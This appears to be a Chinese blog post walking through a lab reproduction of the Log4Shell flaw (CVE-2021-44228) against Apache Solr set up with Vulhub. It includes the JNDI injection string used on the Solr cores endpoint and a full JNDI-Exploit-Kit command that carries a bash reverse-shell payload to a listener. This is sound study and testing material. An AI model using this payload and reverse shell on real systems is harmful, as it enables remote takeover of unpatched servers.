log4jshell CVE-2021-44228 复现

漏洞介绍

Log4j 是 Apache 提供的一个非常流行的 Java 日志框架。漏洞编号 CVE‑2021‑44228,就被称作 "Log4Shell",该漏洞存在于 Log4j 2 版本(从 2.0‑beta9 到 2.14.1)中,因为其日志处理机制中对 JNDI(Java 命名与目录接口)查找没有做限制或验证。攻击者只要向日志字段输入恶意 JNDI 字符串(例如 ${jndi:ldap://攻击者IP/对象}),Log4j 就会去远端服务器加载 Java 对象,从而导致 远程代码执行(RCE)

复现

通过Vulhub快速搭建环境

bash 复制代码
D:\vulhub\log4j\CVE-2021-44228
docker compose up -d

进入页面,发现Apache Solr

POST参数位置存在漏洞

bash 复制代码
/solr/admin/cores?action=${jndi:ldap://xxx}

RCE

我这里使用的java环境为java11

使用JNDI-Exploit-Kit进行利用

https://github.com/pimps/JNDI-Exploit-Kit

也可以使用ysoserial生成java反序列化载荷进行利用

https://github.com/pimps/ysoserial-modified

bash 复制代码
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C 'bash -i >& /dev/tcp/192.168.10.69/4444 0>&1' -L 192.168.10.69:1234

成功得到shell

相关推荐
网络安全许木2 天前
自学渗透测试第12天(渗透测试流程与DVWA部署)
web安全·网络安全·渗透测试
vortex52 天前
SOAP 协议中的 XML 外部实体注入(XXE)漏洞
xml·网络安全·渗透测试
Sombra_Olivia2 天前
Vulhub 中的 bash CVE-2014-6271
安全·web安全·网络安全·渗透测试·vulhub
网络安全许木2 天前
自学渗透测试第八天(网络安全法、伦理规范与工具链联动)
windows·web安全·网络安全·渗透测试·kali linux
智擎软件测评小祺2 天前
从报告看懂安全隐患,提升防护能力
安全·web安全·渗透测试·测试·检测·cma·cnas
vortex52 天前
从应用层到内核层:SOCKS 代理与 TUN 模式全解析
网络·网络安全·渗透测试
桃地睡不着3 天前
ai安全工具:CyberStrikeAI安装部署与使用
人工智能·安全·渗透测试
缘友一世5 天前
当LLM Agent遇上真实渗透测试:从失败分类到难度感知规划的系统性突破
人工智能·渗透测试
vortex55 天前
一文厘清DDoS与CC攻击
网络·网络安全·渗透测试·ddos
Howrun7775 天前
C++ 项目测试全指南:从 0 基础到落地实操
开发语言·c++·log4j